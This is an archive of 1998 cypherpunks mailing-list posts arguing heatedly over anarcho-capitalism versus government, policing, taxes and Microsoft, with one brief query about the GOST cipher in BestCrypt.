>Yep, and a lot of people the competition would eliminate as well. I'll live
>with the inefficiency as long as the cost is affordable for the quality of
>service delivered. I don't mind fireman sitting around eating bar-b-q unless
>somebodies house burns down.

	I am not just talking about firehouses Jim, and I don't mind them
barbequing either.

>> 	Read that last bit. They got so carried away, that they spent
>> themselves out of existence.

>That is one example, I know of several fortune 100 companies that are equaly
>extravagant. The problem with Compu-Add was they shot their whole wad.

	Extravagance isn't always bad. I just spent 1 1/2 weeks (well
almost) living at a hotel in Sunnyvale on Playboy's dime. They let us spend
a bit of money, stay in nice hotels (Marriot Residence Inn), eat pretty
much what we want (I've never hit the meal limits, but I don't eat too
fancy) we can get up to a full sized car (they wouldn't let me rent a
motorcycle, but that was more insurance than anything), it is a bit on the
extravagant side, but I was also working 10 to 15 hour days for 12 straight
days (worked before I left to go out there as well). It's sort of a
"payment in kind".

	It isn't the extravagance of Business, it's the idiotic things they
spend money on. Microsoft Exchange for instance. About 5 times more
expensive than a competitive product, and about 20 times more expensive
than the cheapest commercial solution that will work.

	There is also a lot of free software out there that does the same
thing.

	So no, I am not going to try to say that Business is has to be more
efficient than Government, just that the market is usually more efficient
than Government.

>> 	Ok, so you limit the senators and congressmen, then the unelected
>> beaureacrats have the power since they know the system and run the system.
>
>Not at all, they are limited in what they can do by the laws. It's not like
>they're running around sending bills to people out of the blue and making up
>the system as they go along. Despite your protestations to the contrary the
>system just don't work that way.

	Look at the IRS, they make their own rules, and send bills to
people randomly.

>> 	Wearing a painted leather jacket & ripped up blue jeans is NOT a
>> reason to get hauled off the street, searched and questioned.
>If it happened to you and you didn't file a harrassment complaint then you
>got what you deserved. If you don't use the system it won't work.

	Oh, they had an excuse, someone wearing blue jeans and a leather
jacket robbed a store--On the other side of town, and I was walking.

>Never happened to me or anyone I knew unless they were in particular places
>at particular times. If a cop busts people at a corner every nite for
>breaking the law it isn't the cops fault, it's the stupid people who keep

	It is when the law used has been thrown out of court every time
it's used, and citizens complain, but the cops still use it to harass
people.


>> 	Looking different is not illegal.
>> 	Thinking different is not illegal.
>Nobody said it was and it isn't. Now if you happen to fit the description of
>another perp well that's just too damn bad.

	The cops seem to think so.

>> 	With a bunch thrown in at the federal level. Federal Matching Funds
>> & etc.
>Oh, malarky (and stay away from my business books). It's obvious you never
>do accounting. The matching funds are for roads outside of the city or for

	There are quite a few roads in Chicago that are maintained by state
and federal funds.

>highways that transit cities. They are not supposed to be used for city
>street or FM or RM roads.

	Supposed to or not, that is what they get used for. LSD in Chicago
is maintained in part by federal funds, it is a (mostly) controled access
highway entirely within Chicago.

>> 	Then why do they keep building them?
>
>Because we still hav an Army whose job it is to defend this country you
>nit-wit. If we didn't keep fixing them and expanding the system as people

	Listen Fuckwad:
	(1) there are paved roads from one coast to the other, as well as
railways.
	(2) There hasn't been a war fought on CONUS since we attacked Mexico.
	(3) Most of the roads being built with federal funds are for
"congestion  relief", not roads to new places so troops can move.

	Most roads being built today are either for Suburbs, or for more
efficiently getting people to and from job centers. If you don't believe
that, you are a fool

	There hasn't been a military case for building superhighways since
the 1930's and 40's.


>move around and expand the Army might find it a tad hard to do their job
>when called to it. And yes, I know the Militia is the one who is supposed
>to be called in for that sort of stuff - that's a whole other topic.

	The Army. Marines, and National Guard are fully capable of getting
whereever they need to go with our without the current highway system, if
they weren't they'd be worthless.

	Also, it is just as easy for the OpFors to use the roads as it is
for the friendlies. I am not saying you are lying with this one, I just
can't believe that anyone was foolish enough to fall for it.

>> 	Promote does not mean "give away", it means "promote", do things
>> which incourage.
>
>Absolutely. While I agree that there are some particular issues that need
>fixing in a major way that is not the same (as you would have us believe) as
>saying as a result the whole system should be scrapped

	I, and others are saying that there is no way of building a system
that cannot, and indeed will not be abused.

>> 	They were the heads of the governments. The skills and abilities it
>> takes to get to that level insure that the people who get there have no
>> concern for those underneath them.
>Oh, you mean insanity, egotism, neurosis, etc.?

	Well, at least egotism, and a complete disregard for the truth.

>> 	So we agree that any government is doomed from the start, since
>> w/out people of honesty and integrity no system will work properly.
>
>No, *all* people are not such. Most people I know are honest and have
>integrity. What has to happen is a set of checks and balances, which we are

	Most people are honest--TO A POINT, and the integrity people have
is getting less and less.

	If everyone you know is honest and has integrity, then you must not
know very many people. None of your friends cheat on their taxes (cheating
is dishonest, refusing to pay would show integrity, if AND ONLY IF it
follows from a belief that the system has no right to demand your labor)
etc?

>admittedly short of at the moment. The system isn't perfect, never claimed
>to be (read the 1st paragraph if the Constitution), and if it remains so
>then it's *OUR* fault and not the systems.

	Any system is flawed, and I will repeat myself:

	(a)Any system will work if enough of the people in that system are
honest, have integrity, believe in the system and want it to work. Any
system.

	(b)No system will work if a large enough number of people within
that system try to cheat, coopt, or otherwise "get over" on that system.

	Given the above, anarchy will work just as well as any other system
in the long run because the world more closely resembles (b) than (a),
hence any system will fail.

>> 	No, that face that stares back from the mirror makes every effort
>> to be as honest and forthright as it can. It causes grief sometimes, but
>> it's the principle.
>You claim to be honest yet promote a system that allows slavery, murder,
>theft, and other horrendous crimes against man....

	No, no, I promote anarchy, you are promoting governments which do
those things.

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 02:54:54 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811110057.SAA21081@einstein.ssz.com>
Message-ID: <v0401170ab26f777366ca@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:57 PM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:

	Part what is attributed to me I wrote, some was written by Albert
P. Franco, whose original message didn't get modified properly by Eudora.
Sorry.

	I've changed his comments to ::

>> Date: Tue, 10 Nov 1998 16:40:11 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the
>>  Foregone(fwd)
>
::I left the good ol' USA too. I now live in a European country with a strong
::socialistic government and I actually find very little interference in my
::day to day life. In fact there seems to be a much higher awareness that
::each
>
>I find very little interference in my daily life as well (except when one of
>you anarcho-cooks starts dropping bombs and threatening people).

>> 	Crap. They take 60+ percent of your income in taxes, that means
>> that they take 60+ percent of your working day.
>They take 40% of my income, or are you talking of France taking 60% of your
>income. Disagreement over the level or specific policies for spending it do
>not justify eliminating the system.

	Specific levels maybe, but spending policies, yes it does.

>> 	They (at least france) throw up HUGE barriers to anyone wanting to
>> start a business, especially if they will need to hire workers. This not
>> only makes it difficult for you to start a business (which would never
>> happen since you've indicated you like someone else making decisions for
>> you) but also increases unemployment (prevents others from creating jobs
>> rather than just begging for them).
>
>And you find that a better place to live then the US?

	Again, That was Franco, I live in the US, and wrote that part.


:: individual is responsible for his and her actions. At the very least there
:: aren't as many lawyers claiming everyone is a victim of something or
:: another (ie. too hot coffee, slippery floors, home owners that shot the
:: poor intruder who didn't get a warning first, etc.)
>
>What is the percentage of lawyers in France to the total population?
>
:: Ain't no where perfect, anarcho-whatever was done about 4000 years ago, I
:: generally prefer to look forward...
>>
>> 	So, the fact that it hasn't been tried in 4000 years means it will
>> never work?
>>
>> 	I guess it's a good thing the wright brothers didn't take that
>> attitude, nor Robert Goddard.
>
>We tried anarchy, it's called cave men. As to Wright and Goddard, they had
>ample evidence in physics (that's been around what 4.5B years) to build
>their expectations on. In the field of politics and social system the only
>thing we have to go with is our imagination, patience, understanding, and
>past practice. 5k years or a little more.
>
>All of those say anarcho-anything systems won't work.

	Those haven't been tried in 5 or 6k years, things change.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 03:10:30 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811110138.TAA21400@einstein.ssz.com>
Message-ID: <v0401170bb26f7963db6c@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:38 PM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 10 Nov 1998 12:33:04 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
>
>> 	Theft, violence and extortion are already legitimate, not only does
>> the government use them all the time, but corporations and indivuduals do
>> as well.
>
>True, at least under a democratic system we can prevent some of the more
>gross abuses by government and can address the inter-personal issues with
>something besides a nylon jacketed .357. Your anarcho-whatever doesn't even
>provide that.

	So you really think I'd shoot you over this discussion?

	Some "interpersonal disputes" diserve to be settled with a .357,
some with discussion.

>> 	There is no (or little) justice under the current system. When was
>> the last time a cop went to jail for a murder that he/she committed while
>> on duty. Is OJ behind bars?
>Several cops in Houston were fired (they got no-billed by the Grand Jury)
>just last week because of a similar issue. There are two cops here in Austin

	I know. They didn't even get _TRIED_ just waved a miss.

>who went to jail because of a murder (they held a kid down on a water bed
>and he suffocated) charge. The current public overwatch group was the result
>of a police call that got out of hand last year and the police had two
>choices - either give the people what they asked for or end loose the civil

	So this oversight group is less than a year old? Wait, see what
it's like in ten years.

>rights case. The two cops who beat Rodney King ended up doing time.

	Which was a total injustice.

>Nobody proved to the jury beyond a shadow of a doubt he was guilty. It is
>far better to let a dozen guilty men go free than to imprison a single
>innocent one. Our legal system may have its problem but I guarantee that a
>lot more guilty people get off scott free than innocent people end up in
>jail.

	The cops often play judge and jury, and if you complain you have
parking tickets and tow bills the rest of the time you live in that city.

>There is more than a little justice under the current system (OJ being the
>perfect example - like it or not).

	If that is justice, then the system NEEDS dismantling.

>> 	We have courts of Law, Justice is ashamed to show her face.

>Somehow I doubt that. If justice is ashamed of anything its that citizens of
>this country don't participate more and express their views with more
>conviction.

	My wife shows up for every single jury summons she gets (I think
she gets them for both of us) she takes a book, wanders down (or up) to the
court house, and waits to be dismissed, since she is an educated white
middle class person, the lawyers have no use for her.

	It's the system.

>
>> 	We recognize that these interactions exist, but guess what, for any
>> sort  of anarchy to exist, it has to happen globally. We are as concerned
>> about the people on the other side of the planet as we are about the people
>> in the next city over. Just not much.
>
>Which, considering that anarchic systems permit murder, theft, rape,
>extortion, etc. without reprisal or limits, means that the vast majority of

	Every system permits murder, theft, rape and extortion, it just
limits it to certain people.

>
>> 	No, we assume the opposite, that nothing works for large numbers of
>> people, and everyone should be free to find their own level.
>
>If nothing works for large numbers of people then why should this? Anarchy
>isn't freedom, it's opportunity to make huge profits with no responsiblity
>and at the expence of others (who are treated as a market commodity and not
>human beings).

	Because some of use prefer to live free.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 03:07:41 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: most of what govts do can be done by business, and done (fwd)
In-Reply-To: <199811110156.TAA21708@einstein.ssz.com>
Message-ID: <v0401170cb26f7bd16d67@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:56 PM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 10 Nov 1998 18:00:44 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: most of what govts do can be done by business, and done
>>  better (Re: How to solve the tax problem w/o anarchy or force)
>
>> 	Roads are the easiest (assuming a government model) things to apply
>> road use taxes to, simply tax gasoline, oil, and tires. Scale your tire tax
>> based on weight and apply it to bicycles as well, then everyone (execpt
>> peds) who uses pays.
>
>Screw that, tax the shoes.

	Ok, just do it in proportion to the weight rating, and the road usage.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scoops <scoops@quiknet.com>
Date: Fri, 13 Nov 1998 03:43:34 +0800
To: cypherpunks@toad.com
Subject: GOST
Message-ID: <199811112052.MAA06750@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Jetico <www.jetico.com> a Finnish company (I believe) offers a number of
encryption algorithms in its BestCrypt package, among which is GOST which
it reports having a 256 key (it also sports Blowfish and DES as I recall).
I also remember a few weeks ago reports in the press and on the List of a
porn ring broken up and some agent involved saying that the some porn was
encrypted in an old KGB program which sounded much like GOST.  The
implication is that it's transparent to the feds.  However I have no idea
about various levels at which it might be implimented.  I'm sure the real
experts on the List will fill you in.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 03:42:20 +0800
To: "Albert P. Franco, II" <mah248@nyu.edu>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the  Foregone(fwd)
In-Reply-To: <3648A8A0.46A41EFC@nyu.edu>
Message-ID: <v0401170eb26f80016982@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:22 AM -0500 11/11/98, Albert P. Franco, II wrote:
>You obviously think that anything goes in business. Frankly Gates is a
>perfect example of why you anarcho-BS is doomed to failure. He will do
>anything (and has) he can to be the only player in every market he touches.

	And despite this, and his having large numbers of lawyers on his
side, and despite having large quantities of cash to persue advertising,

	LINUX IS KICKING HIS ASS IN THE SERVER MARKET, and poised to do the
same on the desktop.

	Linux had little corporate funding (some Government thru it's
subsidies of colleges and the internet), almost no advertising, and no, or
negative mindshare until recently.

>He has destroyed otherwise perfectly good businesses and products just to
>increase his profits. He has violated workers rights to increase his
>profit. In short he has demonstrated that if you let him murder wouldn't be
>to far a step to reach his goals.

	Ah, but if we let HIM, then we'd have that shot as well.

>He is the monster that proves that your ideas are actually very very old

	He is not a monster, he is just doing what many other businessmen
have done down thru the years.

>And so everybody's so busy shooting each other that nobody is investing,
>and I have to ask, "What happened to the capitalism part of
>anarcho-capitalism?"

	You assume that people will always be shooting. Most will figure
out that guns really aren't an economical solution to most problems.

	Remember the "Bad, Bad" wild west? Well, it seems that despite what
the movies tell you, you are more likely to get shot today in parts of
Chicago or LA than in most of the Old West. Why? Guns really don't pay as a
wealth _getter_, only as a wealth keeper.

>War is simply not good economics, and anarchy is war--constant, festering,
>sometimes small scale, sometimes large scale, but always war.

	By that comparison, so is life.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Thu, 12 Nov 1998 02:49:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3649D60A.EB13E9A1@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Albert P. Franco, II wrote:
> 
> >> Without some government the Bad Guys will be the only ones with anything.
> >> It is only with the threat of losing their power that leaders do good. If
> >> they had no power which could be lost or taken they will always do what's
> >> best for them in the short term, which is usually to shit on the peons.
> >> Dictators (like Pinochet and Gates) do their dirty deeds because they feel
> >> no need to placate the masses.
> >
> >If they wield no real power, and proceed to do whatever is best for them
> >in the short term, they will be screwing themselves over in the long
> >term (or short term, if doing what they want results in someone shooting
> >them in self defense).
> >
> 
> I re-read my original sentence and it seems that your interpretation is
> possible. I would like to clarify that the power I refer to is only that
> part of their power which might be lost or threatened. Clearly if they have
> no power they can't lose it. I want to say that if some or all of their
> power could be placed in jeopardy they would tend to better behaved. Why do
> you suppose Clinton spent so much time licking everybodys' boots and
> repeatedly embellishing his "apologies" to the "public".

But how can you plausibly threaten the power of he who has the most
power?  That would imply that a greater power exists -if so, how do we
control those who wield *it*?  Checks and balances don't work if those
in power aren't willing to check others in power (because, for example,
they're on the same side).

> >And precisely what dirty deeds has Mr. Gates ever done?  Excluding those
> >actions in which the judicious use of state regulation was involved.
> 
> You obviously think that anything goes in business. Frankly Gates is a
> perfect example of why you anarcho-BS is doomed to failure. He will do
> anything (and has) he can to be the only player in every market he touches.

So?  As long as he doesn't initiate force against anyone, I see no
reason why he should be physically prevented from doing what he does.  I
dislike the way he operates, but neither I nor anyone else has the right
to initiate force upon him to stop him, so long as he doesn't initiate
force himself.

My solution to the problematic behavior of Mr. Gates is not to patronize
him wherever possible, to within a certain level of convienience.  For
example, I do not run MS software on my system --it sucks compared to
Linux.

Other people hate microsoft even more, and actively work against it. 
These people either work for competing companies, agitate the public to
shun microsoft, or write good open source software, in an attempt to
remove microsoft's market.

> He has destroyed otherwise perfectly good businesses and products just to
> increase his profits. He has violated workers rights to increase his
> profit. 

How?  What rights have been violated?  Did he at any time initiate force
against any of these workers?  Did he hire soldiers to storm into
competitors' offices to murder and destroy everyone and everything?  If
he has, I certainly haven't heard of it.

I suspect that any "rights" which you think have been "violated" turn
out to be non-rights, if you're anything other than a socialist.  (which
you may very well be  --in which case, you'd be irrational and very good
at doublethink, making intelligent argument futile)

> In short he has demonstrated that if you let him murder wouldn't be
> to far a step to reach his goals.

I do not agree with this appraisal, and do not care, as long as he
doesn't initate force, or use the state to initate force.  Until then,
he has as much right to do what he does as you have to do whatever it is
that you do.

> He is the monster that proves that your ideas are actually very very old
> (caveman days) and are doomed by progress and civilization. Injecting
> capitalism (investment oriented markets) into barbarism doesn't change the
> fact that it is still barbarism, which in facts negates the ability to have
> investment oriented markets, or capitalism. Who would invest if someone
> with a gun could come and take it without out fear of retribution.

But my point all along is that anyone who takes a gun and tries to take
something *is* likely to face retribution --either from those he steals
from, or from others who don't wish to be robbed by him.  This
retribution can take many forms, ranging from death, to ostracism, to a
lowering of his reputation, depending upon how severe his crime was.

You just haven't been reading what I've been saying, have you?

> >> years, then how the hell do think you can convince somebody that the people
> >> are going to be able to control warlords and monopolies. It's called, "You
> >> don't like it? Bang, Bang, you're dead!"
> >
> >Yah, and then somebody else points a gun at Mr. would-be warlord and
> >goes Bang, Bang, he's dead  (it's unsafe having warlords about --sorta
> >like scorpions).  That is, if Mr. would-be manages to shoot me without
> >being shot himself.
> >
> 
> And so everybody's so busy shooting each other that nobody is investing,
> and I have to ask, "What happened to the capitalism part of
> anarcho-capitalism?"

Such events would be rare, since it's pretty easy for all parties
concerned to figure out the likely result of such an exchange.  Mr.
would-be-warlord will probably not act on his desires, since he knows
that it would at best drop his reputation through the floor, and at
worst, result in his death.

Unless of course, he's a real lunatic  -in which case, he'd have gone
out and attacked someone anyway.  It's actually better this way.  At
least we don't have to worry about intelligent would-be-warlords
manipulating the state to do their dirty work for them. 

In sum, the possibility of getting killed tends to put a damper on the
would-be-warlord population.

> >> Try to lift yourself out of the bullshit of your theory and give us at
> >> least one REAL example (current or historic) of a large scale, long lasting
> >> anarcho-capitalist society. Hippie communes are too small, and make sure
> >> it's capitalistic. If you can't think of one in the next year or so then
> >> come back and tell us.
> >
> >It hasn't happened yet.  But then, neither had the USA, before 1776.
> >The above is not a reasonable argument.
> 
> WRONG!!!! Parliaments and representative governments did exist in somewhat
> other forms. 1776 was NOT a revolution it was evolution. It comes from
> among other things the Magna Carta of England as well as many other
> concepts astutely compiled by the "forefathers".

Ok, then think of it this way.  Instead of having one big, centralized
state, where orders are given from on high, and are thus frequently
inequitous to lowly individuals, let's go for a more evenly distributed
model.  Let's carry this distribution to the point where everyone
governs himself and his property.

Previous attempts at such things would have failed, since humaity lacked
communications systems which were fast enough to link such a system
together.  
Previous forms of government all reflect this fact.  Communication was
always very centralized, and thus governance had to be as well, to keep
everyone up to speed on what's going on.  As communications technologies
improved, states have become more and more decentralized.  (go from the
mesopotamian warrior-kings, to Rome, to monarchy, to parliamentary
government, to the US).  

And today, we are presented with the internet --the ultimate in
decentralized, near instantaneous communications.  We aren't very far
from making it possible for anyone, anywhere, to communicate with anyone
else, wherever they may be.  Obviously, this makes it possible to
progress even further by decentralizing things even more!

The net result is indistinguishable from anarcho-capitalism.  I'd be
satisfied with it.  Do you like it better from this angle?

> Your propositions emanate from a basis which existed before there were
> nations and well before investment and economic development began. In fact,
> anarchy had to be overcome before consistent development could occur. Once
> we organized our societies and brought long (relatively) periods of peace
> to the general populace economic and scientific development began to grow.
> Certainly you will find it impossible to site any anarchic or nearly

No, but you couldn't have cited the United States before it existed
either.

> anarchic "society" (oxymoron)

Only if you persist in confusing society with the state.

> which has brought sustained significant
> development.
> 
> >
> >You can, of course, as me how it *could* happen.  And unfortunately,
> >you're partially correct, it couldn't happen under current conditions.
> >The amount of personal firepower that is easily accessible by everyone
> >is not sufficient to back up the soverignity of each individual.  It's
> >all linked to whether weapons technology is such that individuals can
> >operate weapons which are just as effective as those wielded by highly
> >trained and specialized groups.  The pendulum of weapons tech. swings
> >back and forth over time.  During the American Revolution, the pendulum
> >was on the side of individuals, as can be shown by the fact that the
> >revolutionaries were carrying better weapons than those carried by
> >professional soldiers, and could use them to equal or larger effect.
> >
> You whole thesis is based on violence, the exact opposite of what's
> required for sustained economic growth.

Nope, it's based on *reality*.  The only way to ensure that no one will
inflict violence upon you is to be capable of inflicting at least as
much violence upon any attacker.  What I'm telling you is that if the
above conditions exist, violence will become a very unhealthy trade, and
will not be practiced by anyone aside from the occasional lunatic who
wants to commit suicide in an interesting fashion. 

> You lose! Consistently wrong
> answers. You just don't get it.

I beg to differ.  It would appear that *you* just don't get it.  Re-read
what I've said in the light of my above paragraph, and see if you come
to the same conclusion.

> War does not produce wide spread economic
> growth in those zones affected by the war. It destroys the infrastructure

I agree that war destroys infrastructure, and is not going to cause
widespread economic growth.  I never said otherwise.  But lets look at
war for a moment, hmm?

Those who start wars usually do so because they think they can win them,
am I correct?  It would be insane to do otherwise.  If conditions were
such that nobody could be sure of winning, there would be very little
incentive to start a war, don't you agree?

Of course, in reality, wars are started between nations by their
leaders, who supposedly act on the behalf of their people.  It is
currently possible for the leader of a nation to have an incentive to
start a war which his country cannot win, so long as *he* profits by it 
-in terms of money, power, etc.  As long as he doesn't lose personally,
he can do whatever he likes (if he's sufficiently amoral, which we must
assume that some leaders will be).  

This is not the same on an individual level, however.  It is never in
the interest of the attacker to attack someone unless he can be
reasonably sure of winning.  The attacker cannot divorce himself from
the results of his actions, as the leader of a nation can, because he
cannot separate his being from his body in any effective sense.  That
is, if his body loses the fight, he's screwed.

The point you raise would seem to be yet another argument for
anarcho-capitalism.  It would appear that preople have even more
incentive not to hurt each other under those conditions than under
present ones.

> that only an organized government is capable of maintaining.

This is untrue.  Organized government is not necessary for the
maintenence of infrastructure.  See my other posts, or "The Market for
Liberty".

> The real answer is to keep the government focused on keeping the peace and
> maintaining the infrastructures using as light a hand as possible--which is
> never going to be an easy task. 

It is an impossible task, as my discussions with Jim Choate have shown.

> But no government is NO GROWTH. The
> libertarians have at least part of the equation correct. They go a little
> too far to one extreme. But this is good, they're mostly just extreme
> enough to pull a wondering government back into the middle where it should
> be. Your anarcho-spew is rubbish, poorly thought out, and without any real
> validation.

I've offered plenty of validation.  You haven't bothered trying to
invalidate these validations, which would be the only way you could
logically disprove my arguement.  Instead, you've deliberately or
unconsciously misunderstood or misread my arguements until they fit in
with what you wanted me to have said.  At which point, you spewed forth
whatever canned response you had ready for what you wished I'd said.

> I bet most of the most fervent defenders of gun ownership on this list
> actually hope never to have to make use of their tunnels, guns, and
> survival rations.

You would be correct.  I like to count myself among them.  I have no
desire to hurt or be hurt, rule or be ruled.

> War is simply not good economics,

100% correct.

> and anarchy is war--constant, festering,
> sometimes small scale, sometimes large scale, but always war.

Incorrect, for the above reasons.

We don't really disagree on the fundamentals.  I suggest that you take a
very close and unbiased look at the points where we seem to disagree.  I
suspect that upon closer examination, you will come to the same
conclusions that I have.  It all hinges on being able to think about
*why* the state might be the only possible solution to various
problems/required services.  This is usually very difficult for most
people, as they've had those beliefs drilled into their skulls since
they were young.  I've found that it's much like a religion, in some
respects.  At least, all the arguments I've ever had with religious
people on the topic of their religion kept ending up much like our
current discussion).  I've since realized how pointless it is to have
such religious arguments.  I haven't given up on politial arguments,
however, and I hope I never have to.  The result is unpleasant to think
about.

Good luck, and watch out for doublethink!

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 05:19:15 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811111750.LAA25041@einstein.ssz.com>
Message-ID: <v04011711b26f86e7086d@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:50 PM -0500 11/11/98, Jim Choate wrote:
>Forwarded message:
>> Date: Wed, 11 Nov 1998 10:49:23 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  (fwd)
>> 	And the system protects them. Pinochet wasn't handed over to spain
>> now was he.
>> 	It's the system.
>No, it's the British system. And to be honest it should be the American
>system also. A country should have jurisdiction only within its own borders.
>Other countries should have agreements about how persons accussed of crimes
>should be extradited.

	So leaders should be able to do whatever they want within their own
borders w/out the possibility of being held responsible for what they do to
citizens of other countries who just happen to be visiting?

	What about rule by law?

>In the anarcho-whatever system this is all eliminated because we've
>eliminated crime in the first place by legitimizing any and all strategies.

	We've also eliminated the government that allowed pinochet to be
the kind of person he was.

>> 	In N.C, Tennesee (IIRC), Illinois, and North Carolina (especially
>> N.C.) it's the state.
>Then have the law changed in those states or you could move to Texas.

	That was not the point, the point was about black market goods.

>
>> 	Crap. Pure B.S. What lead to it's regulation was a bunch of broads
>> who didn't want ANYONE drinking, so they pushed for abolition, which was a
>> total disaster, and lead to repeal.
>
>No, that was prohibition. The taxation of alcohol goes back equaly far in

	Sorry, was thinking prohibition and typing abolition.

>the history of this country. To before the articles of confederation even
>since Britian required taxes on rum and related items - espcialy if they
>were from non-British ports -  if you would stop knee-jerking responces and
>think back the Tax Acts were one of the reasons we had a revolution in the
>first place. Tea, rum, and whiskey were one of the primary motivations.

	So then you admit you were lying about the deaths and blindness
being the cause of regulation, since you claimed it happend in the late
1800's & early  1900's, but the regualtion and taxing went all the way back
to the middle ages?

>> 	Ever heard of "Muckraking"? Yellow Journalism? Could it have been
>> that that lead to some of this B.S. regulation? Nah, the press never would
>> have done something like that.
>
>Actualy, the fact that you admit that the press can be in colussion with the
>government and the businesses goes a long way toward demonstrating that
>anarcho-anything won't work because it will be even harder for

	It prevents businesses from using the Press to manipulate the
government into doing something about a problem that doesn't exist.

>whistle-blowers and 'social do-gooders' to get their message out (unless
>they're well heeled and don't mind loosing it all in the process).

	That is already/still the case. You piss off the wrong people, you
die.

>> 	Remember the movie "Reefer Madness", and the Jim Crow drug laws of
>> the early 1900's? Couldn't be that people in positions of power at the time
>> had certain agendas and used lies to further them could it.
>
>People always have agenda's (this is segues nicely into what Blanc was
>saying about attitudes), that's my point and one of the reasons that
>anarcho-whatever won't work is because it doesn't recognize this nor does it
>put any sort of limit on its expression.

	It INHERENTLY recognizes it, and inherently limits it.

	No one has the power.

	THAT'S THE POINT.

>> 	Nah, people in government NEVER behave like that.
>People always behave that way, it's the way people are. Being in government
>is only another mechanism it gets expressed through. Business is another.

	Some agendas can't be pushed thru business, or at least not the
same way.

>> 	No I didn't, EVEN IF I GET THEM LEGALLY, if I turn around and sell
>> them, it's black market, that was muy fucking point, I'm sorry if you can't
>> comprehend that sort of thing.
>
>If the doctor gives them to you without a valid medical reason then you
>didn't get them legaly. Techicaly the doctor is in violation for trafficking
>and you would be in violation for possession and use of a controlled

	Damn you're fucking DENSE. I wasn't arguing that, I KNOW that, I
ACCEPT THAT, THAT WAS NEVER THE FUCKING ISSUE.

>substance. If you knew full well that you weren't going to use them and took
>them anyway then you in effect stole them because you misled the doctor into
>giving them to you. Now if you simply sold them because you didn't like their
>side effects then only you are legaly culpible.

	If I got them legally, they were a legal commodity, if I dispose of
them legally, they move from the "white" market, to the "black" market.

	That was my entire fucking point.

>Now, your point that not everything on the black market is stolen is well
>take as I've said before (you just didn't read it, it at least explains why

	You keep arguing these side points like you don't understand what I
am saying.

	The fact that not everything on the black market was stolen ISN'T
the point, the point is that there can be things on the black market that
aren't stolen, and aren't inherently illegal (tomatoes, vicadan, alcohol)
